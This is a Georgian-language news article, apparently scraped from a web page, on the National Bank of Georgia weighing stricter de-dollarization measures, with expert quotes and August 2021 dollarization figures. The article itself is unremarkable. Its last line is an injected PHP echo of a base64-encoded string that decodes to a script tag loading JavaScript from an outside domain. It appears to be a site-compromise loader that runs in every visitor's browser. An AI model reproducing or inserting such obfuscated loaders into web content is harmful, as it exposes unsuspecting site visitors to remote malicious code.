celsiusi
ავერსი საქკაბელი
ეროვნული ბანკი დედოლარიზაციის პოლიტიკის კიდევ უფრო გამკაცრებას არ გამორიცხავს.
 
მარეგულირებელს საერთაშორისო სავალუტო ფონდის რეკომენდაცია ლარიზაციის გააქტიურებასთან დაკავშირებით ლოგიკურად მიაჩნია. ცენტრალურ ბანკში დედოლარიზაციის გამკაცრების რესურსს ხედავენ და აღნიშნავენ, რომ ამისთვის საბანკო სექტორიც მზად არის.
 
ეროვნული ბანკის მაკროეკონომიკისა და სტატისტიკის დეპარტამენტის უფროსის განმარტებით, მარეგულირებელმა შესაძლოა განიხილოს რამდენიმე მექანიზმი. მათ შორის, სესხის მომსახურების კოეფიციენტის ცვლილება და სარეზერვო მოთხოვნების გამკაცრება.
 
„იქიდან გამომდინარე, რომ საქართველოში დოლარიზაცია მის ბუნებრივ დონესთან შედარებით მაღალია, ჭარბი დოლარიზაცია ქმნის რისკებს. ეს არის ხარჯი ეკონომიკისთვის, რომელსაც მთელი ქვეყანა იხდის. იქნება ეს მაკრო-ეკონომიკური მენეჯმენტის კუთხით თუ ფინანსური სტაბილურობის კუთხით. რა ღონისძიება შეიძლება გამკაცრდეს ეს დამოკიდებულია ფინანსური სექტორის ანალიზზე,“ - აღნიშნა შალვა მხატრიშვილმა.
 
მისივე განმარტებით, დოლარში დაკრედიტების შემცირებისკენ გადადგმულმა ნაბიჯებმა არასაკმარისი, თუმცა გარკვეული შედეგები გამოიღო. 2017 წლიდან დღემდე სესხები დოლარიზაციის მაჩვენებლები 13%-ული პუნქტით, ხოლო დეპოზიტების დოლარიზაციის მაჩვენებლები 12%-ული პუნქტით არის შემცირებული.
 
საერთაშორისო სავალუტო ფონდის რეკომენდაციას დედოლარიზაციის პოლიტიკის გამკაცრებასთან დაკავშირებით, სპეციალისტებიც ეთანხმებიან, მათი განმარტებით, დედოლარიზაციის კუთხით რეალური შედეგების მისაღებად უფრო ხისტი და არაკომპრომისული მეთოდების გამოყენება უნდა მოხდეს.
 
„თუ გვინდა შედეგის მიღწევა, უფრო ხისტი მეთოდები უნდა გამოვიყენოთ. ამ შემთხვევაში ჩვენთან არის კომპრომისული გადაწყვეტილება და ის შედეგები რაც მივიღეთ არ არის ისეთი, როგორსაც თუნდაც ეროვნული ბანკი ელოდა. როგორც ჩანს, უნდა გაეცეს კითხვას პასუხი მივაღწიეთ თუ არა შედეგს, თუ ვერ მივაღწიეთ, ან უარი უნდა ვთქვათ ამ პოლიტიკაზე ან გავამკაცროთ ეს პოლიტიკა,“ - განმარტავს PMC კვლევითი ცენტრის დირექტორი გიორგი ხიშტოვანი.
 
რაც შეეხება საბანკო სექტორის წარმომადგენლებს, „პაშა ბანკის“ გენერალური დირექტორის განმარტებით, რომ არა დედოლარიზაციის კუთხით ბოლო პერიოდში გადადგმული ნაბიჯები, კოვიდ 19-ით გამოწვეული შოკების გადატანა ფინანსურ სექტორს და მომხმარებლებს კიდევ უფრო გაუჭირდებოდათ.
 
„დედოლარიზაციის კუთხით გვაქვს გარკვეული პროგრესი. წინაც წავედით და მცირე უკან დახევებიც გვქონდა იმის გამო, რომ გარეგანი შოკები მივიღეთ. თუმცა, მთლიანობაში, დედოლარიზაციის პოლიტიკა რომ არ ყოფილიყო და უცხოური სესხების წილი მთლიან პორტფელში კიდევ უფრო მაღალი გვქონოდა, ბევრად რთული სიტუაცია იქნებოდა. შესაბამისად, გარეგანი შოკების გადატანაც უფრო მეტად გაგვიჭირდებოდა,“ - განმარტა ნიკოლოზ შურღაიამ.
 
მისივე თქმით, ლარიზაციის წარმატება მხოლოდ ეროვნულ ბანკზე არ არის დამოკიდებული.
 
„პრაქტიკულად რომ ვიმსჯელოთ ლარიზაციის შედეგებზე, მხოლოდ ეროვნული ბანკის ძალისხმევა არ არის საკმარისი. ამ საკითხში ჩართული უნდა იყოს ეკონომიკის ყველა აგენტი, მათ შორის, დიდია მთავრობისა თუ სასამართლო სისტემის როლი. მთელი ქვეყნის ეკონომიკა თუ იმუშავებს ერთი მიმართულებით, რა თქმა უნდა, უფრო იოლად მივაღწევთ დასახულ მიზანს. მთლიანობაში ლარიზაცია, ანუ ის, რომ ქვეყანაში არამარტო მიმოქცევის ერთადერთი საშუალება იყოს ლარი, არამედ დეპოზიტებისა და სესხების უმრავლესობაც იყოს ერვნულ ვალუტაში, არის ძალიან დიდი მიზანი. თუ ამას მივაღწევთ, ეროვნული ბანკის მიერ განხორციელებული ფულად-საკრედიტო პოლიტიკის განხორციელება იქნება ბევრად უფრო ადვილი და შესაბამისად, ეფექტურიც,“ - განმარტავს ნიკოლოზ შურღაია.
 
დედოლარიზაციის პოლიტიკა ეროვნულმა ბანკმა 2016 წლიდან გააქტიურა. 2017 წლის 1-ლი იანვრიდან 100 000 ლარამდე სესხების უცხოურ ვალუტაში გაცემა აიკრძალა, შემდგომში კი აკრძალვა 200 000 ლარამდე სესხების უცხოურ ვალუტაში გაცემასაც შეეხო.
ეროვნული ბანკის მიერ გამოქვეყნებული სტატისტიკის მიხედვით, 2021 წლის აგვისტოში, წინა თვესთან შედარებით, დოლარიზაციის მაჩვენებელი დეპოზიტებზე დაახლოებით, 0.6%-ული პუნქტით 60.01%-მდე გაიზარდა, ხოლო სესხებზე ოდნავ შემცირდა და 52.27% შეადგინა უცხოური ვალუტით განთავსებულ დეპოზიტებში აშშ დოლარის წილმა 83.83%, ევროს წილმა 14.75% შეადგინა.
1195
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");